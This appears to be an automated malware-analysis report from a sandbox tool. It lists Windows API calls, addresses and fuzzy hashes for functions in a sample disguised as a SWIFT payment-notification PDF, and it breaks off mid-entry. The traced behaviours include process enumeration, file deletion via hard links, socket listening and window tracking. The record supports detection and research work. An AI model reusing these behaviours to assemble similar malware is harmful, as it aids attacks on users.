                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                              • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                                              • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                              • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2808897238-0
                                                                                                                              • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                              • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                              • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                              • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3880355969-0
                                                                                                                              • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                              • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                              • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                              • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                              APIs
                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                              • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1352109105-0
                                                                                                                              • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                              • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                              • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                              • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                              APIs
                                                                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3321077145-0
                                                                                                                              • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                              • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                              • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                              • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32(?), ref: 004503C8
                                                                                                                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Proc$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2351499541-0
                                                                                                                              • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                              • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                              • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                              • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                              APIs
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                              • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                              • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1795658109-0
                                                                                                                              • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                              • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                              • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                              • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                              • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                              • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2759813231-0
                                                                                                                              • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                              • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                              • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                              • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2169480361-0
                                                                                                                              • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                              • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                              • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                              • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2796087071-0
                                                                                                                              • Opcode ID: 51126c733895e8e7c94d30f09980aa3e30757bad3e7b77a7cf6718898b26df1d
                                                                                                                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                              • Opcode Fuzzy Hash: 51126c733895e8e7c94d30f09980aa3e30757bad3e7b77a7cf6718898b26df1d
                                                                                                                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                              • String ID: cdecl
                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                              • Opcode ID: 6f724ca556b076b979e87721982b9721ac4da90a823fbcba5ce28e69638de39c
                                                                                                                              • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                              • Opcode Fuzzy Hash: 6f724ca556b076b979e87721982b9721ac4da90a823fbcba5ce28e69638de39c
                                                                                                                              • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32 ref: 00448C69
                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 312131281-0
                                                                                                                              • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                              • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                              • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                              • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                              APIs
                                                                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastacceptselect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 385091864-0
                                                                                                                              • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                              • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                              • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                              • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                              • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                              • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                              • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                                                                              • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                                                                              • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                                                                              Memory Dump Source
